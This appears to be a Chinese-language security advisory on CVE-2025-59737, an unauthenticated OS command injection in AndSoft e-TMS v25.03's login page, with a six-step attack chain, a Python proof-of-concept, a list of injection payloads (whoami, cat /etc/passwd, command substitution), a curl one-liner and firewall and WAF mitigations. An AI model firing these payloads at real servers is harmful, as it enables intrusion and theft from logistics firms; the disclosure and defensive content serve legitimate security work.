CVE-2025-59737：AndSoft e-TMS 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-59737

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59737 是 AndSoft 公司开发的 e-TMS（电子运输管理系统）v25.03 版本中存在的一个高危操作系统命令注入漏洞。该漏洞的 CVSS 3.1 评分高达 9.8 分，属于严重级别漏洞。e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理订单、调度、车辆跟踪等业务。由于该漏洞允许未经身份验证的远程攻击者通过构造特定的 POST 请求，在服务器端执行任意操作系统命令，因此对使用该系统的企业构成了严重的安全威胁。攻击者无需任何身份验证即可利用此漏洞，且无需用户交互，这使得该漏洞极易被自动化工具大规模利用。一旦成功利用，攻击者可以完全控制受影响的服务器，获取敏感业务数据、安装恶意软件、进行横向移动，甚至将服务器纳入僵尸网络进行进一步攻击。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，其披露凸显了物流运输行业应用系统中安全防护的不足。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）漏洞，存在于 AndSoft e-TMS v25.03 的登录框架页面 '/clt/LOGINFRM_LXA.ASP' 中。具体而言，应用程序在处理 POST 请求中的 'm' 参数时，未对用户输入进行充分的验证和过滤，直接将参数值传递给底层操作系统的命令执行函数（如 cmd.exe 或 /bin/sh）。攻击者可以通过在 'm' 参数中注入操作系统命令分隔符（如 '; '、'&&'、'||'、'|' 等），将恶意命令附加到合法命令之后执行。例如，攻击者可以发送包含类似 '合法值; whoami' 或 '合法值 && cat /etc/passwd' 的 payload，从而在服务器上执行任意命令。由于该漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），且对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），因此其 CVSS 评分达到满分级别的 9.8 分。漏洞的根本原因是应用程序未能遵循安全编码最佳实践，未对用户输入进行白名单验证或参数化处理，导致用户可控数据流入到危险的系统调用中。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过 Shodan、Censys 等网络空间搜索引擎或端口扫描工具，识别暴露在公网上的 AndSoft e-TMS v25.03 服务器，定位存在漏洞的 '/clt/LOGINFRM_LXA.ASP' 端点。

STEP 2

步骤2：漏洞验证

攻击者向目标端点发送包含 'm' 参数的 POST 请求，在参数中注入简单的测试命令（如 'whoami'、'id'），验证命令注入漏洞是否存在以及命令执行结果是否回显。

STEP 3

步骤3：命令执行与权限获取

确认漏洞后，攻击者构造更复杂的 payload，利用命令分隔符执行任意系统命令，获取服务器的用户权限、系统信息、网络配置等敏感信息。

STEP 4

步骤4：权限提升与持久化

攻击者通过上传 WebShell、添加计划任务、创建后门账户等方式获取服务器的持久访问权限，并尝试进行本地权限提升以获取更高权限。

STEP 5

步骤5：横向移动与数据窃取

攻击者利用已控制的服务器作为跳板，在内网中进行横向移动，访问数据库服务器、文件服务器等关键资产，窃取运输订单、客户信息、财务数据等敏感业务数据。

STEP 6

步骤6：影响扩大

攻击者可能植入勒索软件、挖矿程序或 DDoS 僵尸网络代理，对企业造成业务中断、经济损失和声誉损害。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59737 - AndSoft e-TMS OS Command Injection PoC
# Vulnerability: OS Command Injection via 'm' parameter in /clt/LOGINFRM_LXA.ASP
# Target: AndSoft e-TMS v25.03

import requests

TARGET_URL = "http://target-host/clt/LOGINFRM_LXA.ASP"

# Malicious payload - inject OS command via 'm' parameter
# Using command separator to execute arbitrary command
payload = "legitimate_value; whoami"

# Alternative payloads for different OS environments
payloads = [
    "value; whoami",                    # Unix/Linux - get current user
    "value && ipconfig",                # Windows - get network config
    "value | dir",                      # Windows - list directory
    "value; cat /etc/passwd",           # Unix/Linux - read passwd file
    "value`whoami`",                    # Backtick execution (Unix)
    "value$(whoami)",                   # Command substitution (Unix)
]

def exploit(target_url, cmd_payload):
    """Send malicious POST request to exploit command injection"""
    data = {
        "m": cmd_payload
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response:\n{response.text[:2000]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Sending command injection payload...")
    exploit(TARGET_URL, payload)

# Curl equivalent:
# curl -X POST http://target-host/clt/LOGINFRM_LXA.ASP \
#   -d "m=legitimate_value; whoami"

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）通过网络防火墙或安全组限制对 '/clt/LOGINFRM_LXA.ASP' 端点的访问，仅允许可信 IP 地址访问；2）部署 Web 应用防火墙（WAF），配置针对命令注入攻击的检测规则，阻断包含常见命令分隔符（如 '; '、'&&'、'||'、'|'、反引号、$() 等）的恶意请求；3）将 e-TMS 服务器部署在内网环境中，通过 VPN 或堡垒机进行访问，避免直接暴露在公网；4）监控系统日志，及时发现和响应可疑的命令执行活动；5）对 e-TMS 服务器进行定期安全检查和漏洞扫描。